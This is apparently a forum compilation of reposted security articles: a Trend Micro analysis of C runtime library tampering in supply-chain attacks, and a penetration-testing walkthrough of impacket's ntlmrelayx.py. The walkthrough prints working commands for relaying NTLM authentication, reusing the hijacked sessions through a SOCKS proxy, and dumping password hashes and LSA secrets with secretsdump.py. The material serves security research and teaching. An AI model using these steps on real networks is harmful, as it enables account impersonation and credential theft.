- Enterprise Mobility Suite (EMS) E5 trial
- Azure Security Center trial

Sursa: https://techcommunity.microsoft.com/t5/Enterprise-Mobility-Security/Detecting-LDAP-based-Kerberoasting-with-Azure-ATP/ba-p/462448
-
Analyzing C/C++ Runtime Library Code Tampering in Software Supply Chain Attacks

Posted on: April 22, 2019 at 7:30 am
Posted in: Malware
Author: Trend Micro
By Mohamad Mokbel

For the past few years, the security industry's very backbone, its key software and server components, has been the subject of numerous attacks through cybercriminals' various works of compromise and modification. Such attacks involve the original software's being compromised via malicious tampering of its source code, its update server, or in some cases, both. In either case, the intention is always to get into the network or a host of a targeted entity in a highly inconspicuous fashion, which is known as a supply chain attack.

Depending on the attacker's technical capabilities and stealth motivation, the methods used in the malicious modification of the compromised software vary in sophistication and astuteness. Four major methods have been observed in the wild:

1. The injection of malicious code at the source code level of the compromised software, for native or interpreted/just-in-time compilation-based languages such as C/C++, Java, and .NET.
2. The injection of malicious code inside C/C++ compiler runtime (CRT) libraries, e.g., poisoning of specific C runtime functions.
3. Other less intrusive methods, which include the compromise of the update server such that instead of deploying a benign updated version, it serves a malicious implant. This malicious implant can come from the same compromised download server or from another completely separate server that is under the attacker's control.
4. The repackaging of legitimate software with a malicious implant. Such trojanized software is either hosted on the official yet compromised website of a software company or spread via BitTorrent or other similar hosting zones.

This blog post will explore and attempt to map multiple known supply chain attack incidents that have happened in the last decade through the four methods listed above.
The focus will be on Method 2, whereby a list of all poisoned C/C++ runtime functions will be provided, each mapped to its unique malware family. Furthermore, the ShadowPad incident is taken as a test case, documenting how such poisoning happens.

Methods 1 and 2 stand out from the other methods because of the nature of their operation, which is the intrusive and more subtle tampering of code; they are a category in their own right. However, Method 2 is far more insidious, since any tampering in the code is not visible to the developer or any source code parser; the malicious code is introduced at the time of compilation/linking.

Examples of attacks that used a combination of Methods 1 and 3 are:

- The trojanization of MediaGet, a BitTorrent client, via a poisoned update (mid-February 2018). The change employed involved a malicious update component and a trojanized copy of the file mediaget.exe.
- The Nyetya/MeDoc attack on M.E.Doc, an accounting software by Intellect Service, which delivered the destructive ransomware Nyetya/NotPetya by manipulating its update system (April 2017). The change employed involved backdooring of the .NET module ZvitPublishedObjects.dll.
- The KingSlayer attack on EventID, which resulted in the compromise of the Windows Event Log Analyzer software's source code (service executable in .NET) and update server (March 2015).

An example of an attack that solely made use of Method 3 is the Monju incident, which involved the compromise of the update server for the media player GOM Player by GOMLab and resulted in the distribution of a variant of Gh0st RAT toward specific targets (December 2013). For Method 4, we have the Havex incidents, which involved the compromise of multiple industrial control system (ICS) websites and software installers (different dates in 2013 and 2014).
Examples of attacks that used a combination of Methods 2 and 3 are:

- Operation ShadowHammer, which involved the compromise of a computer vendor's update server to target an unknown set of users based on their network adapters' media access control (MAC) addresses (June 2018). The change employed involved a malicious update component.
- An attack on the gaming industry (Winnti.A), which involved the compromise of three gaming companies and the backdooring of their respective main executables (publicized in March 2019).
- The CCleaner case, which involved the compromise of Piriform, resulting in the backdooring of the CCleaner software (August 2017).
- The ShadowPad case, which involved the compromise of NetSarang Computer, Inc., resulting in the backdooring of all of the company's products (July 2017). The change employed involved malicious code that was injected into the library nssock2.dll, which was used by all of the company's products.

Methods 2 and 3 were also used by the Winnti group, which targeted the online video game industry, compromising multiple companies' update servers in an attempt to spread malicious implants or libraries using the AheadLib tool (2011). Another example is the XcodeGhost incident (September 2015), in which Apple's Xcode integrated development environment (IDE) and the compiler's CoreServices Mach-O object file were modified to include malware that would infect every iOS app built (via the linker) with the trojanized Xcode IDE. The trojanized version was hosted on multiple Chinese file sharing services, resulting in hundreds of trojanized apps' landing on the iOS App Store unfettered.

An interesting case that shows a different side to the supply chain attack methods is the event-stream incident (November 2018). Event-stream is one of the widely used packages on npm (Node.js package manager), a package manager for the JavaScript programming language.
A package known as flatmap-stream was added as a direct dependency to the event-stream package. The original author/maintainer of the event-stream package delegated publishing rights to another person, who then added the malicious flatmap-stream package. This malicious package targeted specific developers working on the release build scripts of the bitcoin wallet app Copay, all for the purpose of stealing bitcoins. The malicious code got written into the app when the build scripts were executed, thereby adding another layer of covertness.

In most supply chain attack cases that have been happening for almost a decade, the initial infection vector is unknown or at least not publicly documented. Moreover, the particulars of how the malicious code gets injected into the benign software codebase are not documented either, whether from a forensics or a tactics, techniques, and procedures (TTP) standpoint. However, we will attempt to show how Method 2, which employs sophisticated tampering of code and is harder to detect, is used by attackers in a supply chain attack, using the ShadowPad case as our sample for analysis.

An In-Depth Analysis of Method 2 – Case Study: ShadowPad

There are subtle differences and observations between tampering with the original source code, as in Method 1, and tampering with the C/C++ runtime libraries, as in Method 2. Depending on the nature and location of the changes, the former might be easier to spot, whereas the latter would be much harder to detect if no file monitoring and integrity checks had been in place.

All of the reported cases where the C/C++ runtime libraries are poisoned or modified are for Windows binaries. Each case has been statically compiled with the Microsoft Visual C/C++ compiler with varying linker versions. Additionally, all of the poisoned functions are not part of the actual C/C++ standard libraries, but are specific to Microsoft Visual C/C++ compiler runtime initialization routines.
Table 1 shows the list of all known malware families with their tampered runtime functions.

Table 1. List of poisoned/modified Microsoft Visual CRT functions in supply chain attacks

Malware family: ShadowHammer
Poisoned function: __crtExitProcess(UINT uExitCode)
  // exits the process; checks if it's part of a managed app
  // it is a CRT wrapper for ExitProcess

Malware family: Gaming industry (HackedApp.Winnti.A)
Poisoned function: __scrt_common_main_seh(void)
  // entry point of the C runtime library (_mainCRTStartup) with support for
  // structured exception handling, which calls the program's main() function

Malware family: CCleaner
Poisoned functions:
  Stage 1: __scrt_common_main_seh(void)
  Stage 2 -> dropped (32-bit): __security_init_cookie()
  Stage 2 -> dropped (64-bit): __security_init_cookie()
  void __security_init_cookie(void);
  // initializes the global security cookie used for buffer overflow protection

Malware family: ShadowPad
Poisoned function: _initterm(_PVFV * pfbegin, _PVFV * pfend);
  // calls entries in a function pointer table
  // the entry (0x1000E600) is the malicious one

It's the linker's responsibility to include the necessary CRT library for providing the startup code. However, a different CRT library could be specified via an explicit linker flag; otherwise, the default statically linked CRT library libcmt.lib, or another, is used. The startup code performs various environment setup operations prior to executing the program's main() function. Such operations include exception handling, thread data initialization, program termination, and cookie initialization.

It's important to note that the CRT implementation is compiler-, compiler option-, compiler version-, and platform-specific. Microsoft used to ship the Visual C runtime library headers and compilation files that developers could build themselves.
For example, for Visual Studio 2010, such headers would exist under "Microsoft Visual Studio 10.0\VC\crt", and the actual implementation of the ShadowPad poisoned function _initterm() would reside inside the file crt0dat.c as follows (all comments were omitted for readability purposes):

This internal function is responsible for walking a table of function pointers (skipping null entries) and initializing them. It's called only during the initialization of a C++ program. The poisoned DLL nssock2.dll is written in the C++ language. The argument pfbegin points to the first valid entry in the table, while pfend points to the last valid entry. The definition of the function type _PVFV is inside the CRT file internal.h:

The above function is defined in the crt0dat.c file. The object file crt0dat.obj resides inside the library file libcmt.lib. Figure 1 shows ShadowPad's implementation of _initterm().

Figure 1. ShadowPad poisoned _initterm() runtime function

Figure 2 shows the function pointer table for ShadowPad's _initterm() function as pointed to by pfbegin and pfend. This table is used for constructing objects at the beginning of the program, particularly for calling C++ constructors, which is what's happening in the screenshot below.

Figure 2. Function pointer table for ShadowPad poisoned _initterm() runtime function

As shown in Figure 2, the function pointer entry labeled malicious_code at the virtual address 0x1000F6A0 has been poisoned to point to malicious code (0x1000E600). It's more accurate to say that it is the function pointer table that was poisoned rather than the function _initterm(). Figure 3 shows the cross-reference graph of the _initterm() CRT function as referenced by the compiled ShadowPad code. The graph shows all call paths (reachability) that lead to it, and all other calls it makes itself.
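Since the CRT source appears here only in screenshots, the table walk performed by _initterm() and the effect of a single poisoned entry can be modeled conceptually. The sketch below is Python purely for illustration; the real code is C operating on raw function pointers, but the control flow is the same:

```python
# Record of which "constructors" ran, in order.
calls = []

def ctor_a():
    calls.append('ctor_a')

def ctor_b():
    calls.append('ctor_b')

def malicious_code():
    # Stand-in for the entry at 0x1000E600 in nssock2.dll.
    calls.append('malicious_code')

# pfbegin..pfend: the function pointer table. None models a null
# entry, which _initterm() skips, exactly as in crt0dat.c.
table = [ctor_a, None, malicious_code, ctor_b]

def initterm(table):
    """Walk the table and invoke every non-null entry, like _initterm()."""
    for fn in table:
        if fn is not None:
            fn()

initterm(table)
print(calls)  # -> ['ctor_a', 'malicious_code', 'ctor_b']
```

The point of the model: the attacker code runs as just another "constructor" during CRT initialization, before main() ever executes, which is why the tampering is invisible at the source level.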
The actual call path that leads to executing the ShadowPad code is:

DllEntryPoint() -> __DllMainCRTStartup() -> _CRT_INIT() -> _initterm() -> __imp_initterm() -> malicious_code() via the function pointer table.

Figure 3. Call cross-reference graph for ShadowPad poisoned _initterm() runtime function

Note that the internal function _initterm() is called from within the CRT initialization function __CRT_INIT(), which is responsible for C++ DLL initialization and has the following prototype:

One of its responsibilities is invoking the C++ constructors for the C++ code in the DLL nssock2.dll, as demonstrated earlier. The said function is implemented inside the CRT file crtdll.c -> object file crtdll.obj -> library file msvcrt.lib. The following code snippet shows the actual implementation of the function _CRT_INIT().

So, how could an attacker poison any of those CRT functions? It's possible to overwrite the original benign libcmt.lib/msvcrt.lib library with a malicious one, or to modify the linker flag so that it points to a malicious library file. Another possibility is hijacking the linking process such that, as the linker is resolving all references to various functions, the attacker's tool monitors this process, intercepts it, and feeds it a poisoned function definition instead. The backdooring of the compiler's key executables, such as the linker binary itself, can be another stealthy poisoning vector.

Conclusion

Although the attacks for Method 2 are very low in number, difficult to predict, and possibly targeted, when one takes place, it can be likened to a black swan event: it will catch victims off guard and its impact will be widespread and catastrophic. Tampering with CRT library functions in supply chain attacks is a real threat that requires further attention from the security community, especially when it comes to the verification and validation of the integrity of development and build environments.
Steps could be taken to ensure clean software development and build environments. Maintaining and cross-validating the integrity of the source code and all compiler libraries and binaries are good starting points. The use of third-party libraries and code must be vetted and scanned for any malicious indicators prior to integration and deployment. Proper network segmentation is also essential for separating critical assets in the build and distribution (update servers) environments from the rest of the network. Important as well is the enforcement of very strict access with multifactor authentication to the release build servers and endpoints. Of course, these steps do not absolve the developers themselves of the responsibility of continuously monitoring the security of their systems.

Sursa: https://blog.trendmicro.com/trendlabs-security-intelligence/analyzing-c-c-runtime-library-code-tampering-in-software-supply-chain-attacks/
-
The security features of modern PC hardware are enabling new trust boundaries and attack resistance capabilities unparalleled in software alone. These hardware capabilities help to improve resistance to a wide range of attacks including physical attacks against DMA and disk encryption, kernel and remote code exploits, and even application isolation through virtualization. In this talk, we will review the metamorphosis and fundamental re-architecture of Windows to take advantage of emerging hardware security capabilities. We will also examine in-depth the hardware security features provided by vendors such as Intel, AMD, ARM and others, and explain how Windows takes advantage of these features to create new and powerful security boundaries and exploit mitigations. Finally, we will discuss the new attack surface that hardware provides and review exploit case studies, lessons learned, and mitigations for attacks that target PC hardware and firmware. Speaker Bio: David Weston is a group manager in the Windows team at Microsoft, where he currently leads the Windows Device Security and Offensive Security Research teams. David has been at Microsoft working on penetration testing, threat intelligence, platform mitigation design, and offensive security research since Windows 7. He has previously presented at security conferences such as Blackhat, CanSecWest and DefCon.
-
Playing with Relayed Credentials

June 27, 2018

During penetration testing exercises, the ability to make a victim connect to an attacker-controlled host provides an interesting approach for compromising systems. Such connections could be a consequence of tricking a victim into connecting to us (yes, we act as the attackers) by means of a phishing email, or by means of different techniques with the goal of redirecting traffic (e.g. ARP poisoning, IPv6 SLAAC, etc.). In both situations, the attacker will have a connection coming from the victim that he can play with. In particular, we will cover our implementation of an attack that involves using victims' connections in a way that would allow the attacker to impersonate them against a target server of his choice, assuming the underlying authentication protocol used is NT LAN Manager (NTLM).

General NTLM Relay Concepts

The oldest implementation of this type of attack, previously called SMB Relay, goes back to 2001, by Sir Dystic of Cult of the Dead Cow, who only focused on SMB connections, although he used nice tricks, especially when launched from Windows machines where some ports are locked by the kernel. I won't go into details on how this attack works, since there is a lot of literature about it (e.g. here) and an endless number of implementations (e.g. here and here). However, it is important to highlight that this attack is not related to a specific application layer protocol (e.g. SMB) but is in fact an issue with the NT LAN Manager Authentication Protocol (defined here). There are two flavors of this attack:

1. Relay Credentials to the victim machine (a.k.a. Credential Reflection): In theory, fixed by Microsoft starting with MS08-068 and then extended to other protocols. There is an interesting thread here that attempts to cover this topic.
2. Relay Credentials to a third-party host (a.k.a.
Credential Relaying): Still widely used, with no specific patch available, since this is basically an authentication protocol flaw. There are effective workarounds that could help against this issue (e.g. packet signing), but only if the network protocol used supports it. There were, however, some attacks against this protection as well (e.g. CVE-2015-0005).

In a nutshell, we could abstract the attack to the NTLM protocol, regardless of the underlying application layer protocol used, as illustrated here (representing the second flavor described above):

Over the years, there were some open source solutions that extended the original SMB attack to other protocols (a.k.a. cross-protocol relaying). A few years ago, Dirk-Jan Mollema extended impacket's original smbrelayx.py implementation into a tool that could target other protocols as well. We decided to call it ntlmrelayx.py, and since then, new protocols to relay against have been added:

- SMB / SMB2
- LDAP
- MS-SQL
- IMAP/IMAPs
- HTTP/HTTPs
- SMTP

I won't go into details on the specific attacks that can be done, since again, there are already excellent explanations out there (e.g. here and here). Something important to mention here is that the original use case for ntlmrelayx.py was basically a one-shot attack, meaning that whenever we could catch a connection, an action (or attack) would be triggered using the successfully relayed authentication data (e.g. create a user through LDAP, download a specific HTTP page, etc.). Nevertheless, amazing attacks were implemented as part of this approach (e.g. ACL privilege escalation as explained here). Also, initially, most of the attacks only worked for credentials that had administrative privileges, although over time we realized there were more possible use cases targeting regular users. These two things, along with an excellent presentation at DEFCON 20, motivated me into extending the use cases into something different.
Value every session, use it, and reuse it at will

When you're attacking networks, if you can intercept a connection or attract a victim to you, you really want to take full advantage of it, regardless of the privileges of that victim's account. The higher the better, of course, but you never know the attack paths to your objectives until you test different approaches. With all this in mind, coupled with the awesome work done on ZackAttack, it was clear that there could be an extension to ntlmrelayx.py that would strive to:

- Try to keep each session open as long as possible once the authentication data is successfully relayed
- Allow these sessions to be used multiple times (sometimes even concurrently)
- Relay any account, regardless of its privilege at the target system
- Relay to any possible protocol supporting NTLM, and provide a way that would make it easy to add new ones

Based on these assumptions, I decided to re-architect ntlmrelayx.py to support these scenarios. The following diagram describes a high-level view of it:

We always start with a victim connecting to any of our Relay Servers, which are servers that implement support for NTLM as the authentication mechanism. At the moment, we have two Relay Servers, one for HTTP/s and another one for SMB (v1 and v2+), although there could be more (e.g. RPC, LDAP, etc.). These servers know little about both the victim and the target. The most important part of these servers is to implement a specific application layer protocol (in the context of a server) and engage the victim in the NTLM authentication process. Once the victim takes the bait, the Relay Servers look for a suitable Relay Protocol Client based on the protocol we want to relay credentials to at the target machines (e.g. MSSQL). Let's say a victim connects to our HTTP Relay Server and we want to relay his credentials to the target's MSSQL service (HTTP->MSSQL).
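To make the NTLM engagement concrete: every blob a Relay Server shuttles between victim and target carries an NTLMSSP signature followed by a message type (1 = NEGOTIATE and 3 = AUTHENTICATE come from the victim, 2 = CHALLENGE comes from the target). A small illustrative helper, not taken from ntlmrelayx.py, that classifies the blob carried in an HTTP Authorization header:

```python
import base64
import struct

NTLMSSP_SIGNATURE = b'NTLMSSP\x00'

def ntlm_message_type(authorization_header_value):
    """Return 1, 2 or 3 for an 'NTLM <base64>' Authorization header value."""
    scheme, _, blob = authorization_header_value.partition(' ')
    if scheme.upper() != 'NTLM':
        raise ValueError('not an NTLM authorization header')
    raw = base64.b64decode(blob)
    if not raw.startswith(NTLMSSP_SIGNATURE):
        raise ValueError('missing NTLMSSP signature')
    # 4-byte little-endian MessageType field right after the signature
    return struct.unpack('<I', raw[8:12])[0]

# A bare type-1 NEGOTIATE message (signature + type only, no flags):
negotiate = base64.b64encode(NTLMSSP_SIGNATURE + struct.pack('<I', 1)).decode()
print(ntlm_message_type('NTLM ' + negotiate))  # -> 1
```

A relay server needs exactly this kind of dispatching: forward the victim's type 1 to the target, hand the target's type 2 back to the victim, and relay the resulting type 3 to complete the authentication as the victim.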
For that to happen, there has to be an MSSQL Relay Protocol Client that can establish the communication with the target and relay the credentials obtained by the Relay Server. A Relay Protocol Client plugin knows how to talk a specific protocol (e.g. MSSQL), how to engage in an NTLM authentication using relayed credentials coming from a Relay Server, and how to then keep the connection alive (more on that later). Once a relay attempt works, each instance of these Protocol Clients will hold a valid session against the target, impersonating the victim's identity. We currently support Protocol Clients for HTTP/s, IMAP/s, LDAP/s, MSSQL, SMB (v1 and 2+) and SMTP, although there could be more! (e.g. POP3, Exchange WS, etc.). At this stage the workflow is twofold:

If ntlmrelayx.py is configured to run one-shot actions, the Relay Server will search for the corresponding Protocol Attack plugin that implements the static attacks offered by the tool.
If ntlmrelayx.py is configured with -socks, no action will be taken, and the authenticated sessions will be held active so they can later be used and reused through a SOCKS proxy.

SOCKS Server and SOCKS Relay plugins

Let's say we're running in -socks mode and a bunch of victims took the bait. In this case we should have a lot of sessions waiting to be used. The way we implemented the use of these sessions involves two main actors:

SOCKS Server: A SOCKS 4/5 server that holds all the sessions and serves them to SOCKS clients. It also tries to keep these sessions alive even when they are not being used. In order to do that, a keepAlive method on every session is called from time to time. This keepalive mechanism is bound to the particular protocol connection relayed (e.g. this is what we do for SMB).
SOCKS Relay Plugin: When a SOCKS client connects to the SOCKS Server, there are some tricks we need to apply.
Since we're holding connections that are already established (sessions), we need to trick the SOCKS client into believing an authentication is happening when, in fact, it's not. The SOCKS server also needs to know not only the target server the SOCKS client wants to connect to, but also the username, so it can verify whether or not there's an active session for it. If there is, it needs to answer the SOCKS client back successfully (or not) and then tunnel the client through the session's connection. Finally, whenever the SOCKS client closes the session (which we don't really want to happen, since we want to keep these sessions active), we need to fake those calls as well. Since all these tasks are protocol specific, we created a plugin scheme that lets contributors add more protocols to be run through SOCKS (e.g. Exchange Web Services?). We currently support tunneling connections through SOCKS for SMB, MSSQL, SMTP, IMAP/s and HTTP/s. With all this information described, let's get into some hands-on examples.

Examples in Action

The best way to understand all of this is through examples, so let's get to playing with ntlmrelayx.py. The first thing you should do is install the latest impacket. I usually play with the dev version, but if you want to stay on the safe side, we tagged a new version a few weeks ago. Something important to keep in mind (especially for Kali users) is to make sure there is no previous impacket version installed, since sometimes the new one will get installed in a different directory and the old one will still be loaded first (check this for help). Whenever you run any of the examples, always make sure the version banner shown matches the latest version installed. Once everything is installed, the first thing to do is to run ntlmrelayx.py specifying the targets (using the -t or -tf parameters) we want to attack. Targets are now specified in URI syntax, where:

Scheme: specifies the protocol to target (e.g.
smb, mssql, all)
Authority: in the form of domain\username@host:port (domain\username are optional and not used - yet)
Path: optional and only used for specific attacks (e.g. HTTP, when you need to specify a base URL)

For example, if we specify the target as mssql://10.1.2.10:6969, every time we get a victim connecting to our Relay Servers, ntlmrelayx.py will relay the authentication data to the MSSQL service (port 6969) at the target 10.1.2.10. There's a special case for all://10.1.2.10. If you specify that target, ntlmrelayx.py will expand it based on the Protocol Client plugins available. As of today, that target will get expanded to 'smb://', 'mssql://', 'http://', 'https://', 'imap://', 'imaps://', 'ldap://', 'ldaps://' and 'smtp://', meaning that for every victim connecting to us, each credential will be relayed to those destinations (we will need a victim's connection for each destination). Finally, after specifying the targets, all we need is to add the -socks parameter and optionally -smb2support (so the SMB Relay Server adds support for SMB2+) and we're ready to go:

# ./ntlmrelayx.py -tf /tmp/targets.txt -socks -smb2support
Impacket v0.9.18-dev - Copyright 2002-2018 Core Security Technologies

[*] Protocol Client SMTP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Running in relay mode to hosts in targetfile
[*] SOCKS proxy started. Listening at port 1080
[*] IMAP Socks Plugin loaded..
[*] IMAPS Socks Plugin loaded..
[*] SMTP Socks Plugin loaded..
[*] MSSQL Socks Plugin loaded..
[*] SMB Socks Plugin loaded..
[*] HTTP Socks Plugin loaded..
[*] HTTPS Socks Plugin loaded..
[*] Setting up SMB Server
[*] Setting up HTTP Server
[*] Servers started, waiting for connections
Type help for list of commands
ntlmrelayx>

And then, with the help of Responder, phishing emails, or other tools, we wait for victims to connect. Every time authentication data is successfully relayed, you will get a message like:

[*] Authenticating against smb://192.168.48.38 as VULNERABLE\normaluser3 SUCCEED
[*] SOCKS: Adding VULNERABLE/NORMALUSER3@192.168.48.38(445) to active SOCKS connection. Enjoy

At any moment, you can get a list of active sessions by typing socks at the ntlmrelayx.py prompt:

ntlmrelayx> socks
Protocol  Target          Username                  Port
--------  --------------  ------------------------  ----
SMB       192.168.48.38   VULNERABLE/NORMALUSER3    445
MSSQL     192.168.48.230  VULNERABLE/ADMINISTRATOR  1433
MSSQL     192.168.48.230  CONTOSO/NORMALUSER1       1433
SMB       192.168.48.230  VULNERABLE/ADMINISTRATOR  445
SMB       192.168.48.230  CONTOSO/NORMALUSER1       445
SMTP      192.168.48.224  VULNERABLE/NORMALUSER3    25
SMTP      192.168.48.224  CONTOSO/NORMALUSER1       25
IMAP      192.168.48.224  CONTOSO/NORMALUSER1       143

As can be seen, there are multiple active sessions impersonating different users against different targets/services. These are some of the targets/services initially specified to ntlmrelayx.py using the -tf parameter. In order to use them, for some use cases, we will be using proxychains as our tool to redirect applications through our SOCKS proxy. When using proxychains, be sure to configure it (configuration file located at /etc/proxychains.conf) to point to the host where ntlmrelayx.py is running; the SOCKS port is the default one (1080). You should have something like this in your configuration file:

[ProxyList]
socks4 192.168.48.1 1080

Let's start with the easiest example: using some SMB sessions with Samba's smbclient.
The list of available sessions for SMB is:

Protocol  Target          Username                  Port
--------  --------------  ------------------------  ----
SMB       192.168.48.38   VULNERABLE/NORMALUSER3    445
SMB       192.168.48.230  VULNERABLE/ADMINISTRATOR  445
SMB       192.168.48.230  CONTOSO/NORMALUSER1       445

Let's say we want to use the CONTOSO/NORMALUSER1 session. We could do something like this:

root@kalibeto:~# proxychains smbclient //192.168.48.230/Users -U contoso/normaluser1
ProxyChains-3.1 (http://proxychains.sf.net)
WARNING: The "syslog" option is deprecated
|S-chain|-<>-192.168.48.1:1080-<><>-192.168.48.230:445-<><>-OK
Enter CONTOSO\normaluser1's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                            DR        0  Thu Dec  7 19:07:54 2017
  ..                           DR        0  Thu Dec  7 19:07:54 2017
  Default                     DHR        0  Tue Jul 14 03:08:44 2009
  desktop.ini                 AHS      174  Tue Jul 14 00:59:33 2009
  normaluser1                   D        0  Wed Nov 29 14:14:50 2017
  Public                       DR        0  Tue Jul 14 00:59:33 2009

		5216767 blocks of size 4096. 609944 blocks available
smb: \>

A few important things here:

You need to specify the right domain and username pair that matches the output of the socks command. Otherwise, the session will not be recognized. For example, if you didn't specify the domain name in the smbclient parameters, you would get an error in ntlmrelayx.py saying:

[-] SOCKS: No session for WORKGROUP/NORMALUSER1@192.168.48.230(445) available

When you're asked for a password, just enter whatever you want. As mentioned before, the SOCKS Relay Plugin that handles the connection will fake the login process and then tunnel the original connection.

Just in case, using the Administrator's session will give us a different type of access:

root@kalibeto:~# proxychains smbclient //192.168.48.230/c$ -U vulnerable/Administrator
ProxyChains-3.1 (http://proxychains.sf.net)
WARNING: The "syslog" option is deprecated
|S-chain|-<>-192.168.48.1:1080-<><>-192.168.48.230:445-<><>-OK
Enter VULNERABLE\Administrator's password:
Try "help" to get a list of possible commands.
smb: \> dir
  $Recycle.Bin                DHS           0  Thu Dec  7 19:08:00 2017
  Documents and Settings      DHS           0  Tue Jul 14 01:08:10 2009
  pagefile.sys                AHS  1073741824  Thu May  3 16:32:43 2018
  PerfLogs                      D           0  Mon Jul 13 23:20:08 2009
  Program Files                DR           0  Fri Dec  1 17:16:28 2017
  Program Files (x86)          DR           0  Fri Dec  1 17:03:57 2017
  ProgramData                  DH           0  Tue Feb 27 15:02:13 2018
  Recovery                    DHS           0  Wed Sep 30 18:00:31 2015
  System Volume Information   DHS           0  Wed Jun  6 12:24:46 2018
  tmp                           D           0  Sun Mar 25 09:49:15 2018
  Users                        DR           0  Thu Dec  7 19:07:54 2017
  Windows                       D           0  Tue Feb 27 16:25:59 2018

		5216767 blocks of size 4096. 609996 blocks available
smb: \>

Now let's play with MSSQL. We have the following active sessions:

ntlmrelayx> socks
Protocol  Target          Username                  Port
--------  --------------  ------------------------  ----
MSSQL     192.168.48.230  VULNERABLE/ADMINISTRATOR  1433
MSSQL     192.168.48.230  CONTOSO/NORMALUSER1       1433

impacket comes with a tiny TDS client we can use for this connection:

root@kalibeto:# proxychains ./mssqlclient.py contoso/normaluser1@192.168.48.230 -windows-auth
ProxyChains-3.1 (http://proxychains.sf.net)
Impacket v0.9.18-dev - Copyright 2002-2018 Core Security Technologies

Password:
|S-chain|-<>-192.168.48.1:1080-<><>-192.168.48.230:1433-<><>-OK
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(WIN7-A\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(WIN7-A\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (120 19136)
[!] Press help for extra shell commands
SQL> select @@servername

--------------------------------------------------------------------------------------------------------------------------------
WIN7-A\SQLEXPRESS

SQL>

I've tested other TDS clients successfully as well. As always, the most important thing is to correctly specify the domain/username information.
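As both the smbclient and mssqlclient examples show, the SOCKS server only hands out a held session when the protocol, target, username and port all match. Here is a toy Python sketch of that lookup logic (this is an illustration, not ntlmrelayx.py's actual code; the session table mirrors the `socks` output above):

```python
# Toy model of the session table printed by the "socks" command
sessions = {
    ("SMB",   "192.168.48.230", "CONTOSO/NORMALUSER1",      445),
    ("MSSQL", "192.168.48.230", "CONTOSO/NORMALUSER1",      1433),
    ("SMB",   "192.168.48.230", "VULNERABLE/ADMINISTRATOR", 445),
}

def find_session(protocol: str, target: str, user: str, port: int) -> bool:
    """Mimic the lookup: the DOMAIN/username pair must match exactly,
    otherwise a 'No session ... available' error is reported."""
    key = (protocol, target, user.upper(), port)
    return key in sessions

print(find_session("SMB", "192.168.48.230", "contoso/normaluser1", 445))    # True
print(find_session("SMB", "192.168.48.230", "workgroup/normaluser1", 445))  # False
```

This is why omitting the domain (so the client defaults to WORKGROUP) makes the lookup fail even though the username itself is correct.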
Another interesting example to see in action is using IMAP/s sessions with Thunderbird's native SOCKS proxy support. Based on this exercise, we have the following IMAP session active:

Protocol  Target          Username             Port
--------  --------------  -------------------  ----
IMAP      192.168.48.224  CONTOSO/NORMALUSER1  143

We need to configure an account in Thunderbird for this user. A few things to keep in mind when doing so:

It is important to specify Authentication method 'Normal Password', since that's the mechanism the IMAP/s SOCKS Relay Plugin currently supports. Keep in mind, as mentioned before, that this will be a fake authentication.
Under Server Settings->Advanced you need to set 'Maximum number of server connections to cache' to 1. This is very important, otherwise Thunderbird will try to open several connections in parallel.
Finally, under the Network Settings you need to point the SOCKS proxy to the host where ntlmrelayx.py is running, port 1080.

Now we're ready to use that account. You can even subscribe to other folders as well. If you combine IMAP/s sessions with SMTP ones, you can fully impersonate the user's mailbox. The only constraint I've observed is that there's no way to keep an SMTP session alive. It will last for a fixed period of time that is configured through a group policy (the default is 10 minutes).
Finally, just in case, for those boxes we have administrative access on, we can simply run secretsdump.py through proxychains and get the users' hashes:

root@kalibeto # proxychains ./secretsdump.py vulnerable/Administrator@192.168.48.230
ProxyChains-3.1 (http://proxychains.sf.net)
Impacket v0.9.18-dev - Copyright 2002-2018 Core Security Technologies

Password:
|S-chain|-<>-192.168.48.1:1080-<><>-192.168.48.230:445-<><>-OK
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xa6016dd8f2ac5de40e5a364848ef880c
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:aeb450b6b165aa734af28891f2bcd2ef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:40cb4af33bac0b739dc821583c91f009:::
HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:ce6b7945a2ee2e8229a543ddf86d3ceb:::
[*] Dumping cached domain logon information (uid:encryptedHash:longDomain:domain)
pcadminuser2:6a8bf047b955e0945abb8026b8ce041d:VULNERABLE.CONTOSO.COM:VULNERABLE:::
Administrator:82f6813a7f95f4957a5dc202e5827826:VULNERABLE.CONTOSO.COM:VULNERABLE:::
normaluser1:b18b40534d62d6474f037893111960b9:CONTOSO.COM:CONTOSO:::
serviceaccount:dddb5f4906fd788fc41feb8d485323da:VULNERABLE.CONTOSO.COM:VULNERABLE:::
normaluser3:a24a1688c0d71b251efec801fd1e33b1:VULNERABLE.CONTOSO.COM:VULNERABLE:::
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
VULNERABLE\WIN7-A$:aad3b435b51404eeaad3b435b51404ee:ef1ccd3c502bee484cd575341e4e9a38:::
[*] DPAPI_SYSTEM
0000   01 00 00 00 1C 17 F6 05  23 2B E5 97 95 E0 E4 DF   ........#+......
0010   47 96 CC 79 1A C2 6E 14  44 A3 C1 9E 6D 7C 93 F3   G..y..n.D...m|..
0020   9A EC C6 8A 49 79 20 9D  B5 FB 26 79               ....Iy ...&y
DPAPI_SYSTEM:010000001c17f605232be59795e0e4df4796cc791ac26e1444a3c19e6d7c93f39aecc68a4979209db5fb2679
[*] NL$KM
0000   EB 5C 93 44 7B 08 65 27  9A D8 36 75 09 A9 CF B3   .\.D{.e'..6u....
0010   4F AF EC DF 61 63 93 E5  20 C5 4F EF 3C 65 FD 8C   O...ac..
From this point on, you probably don't need to use the relayed credentials anymore.

Final Notes

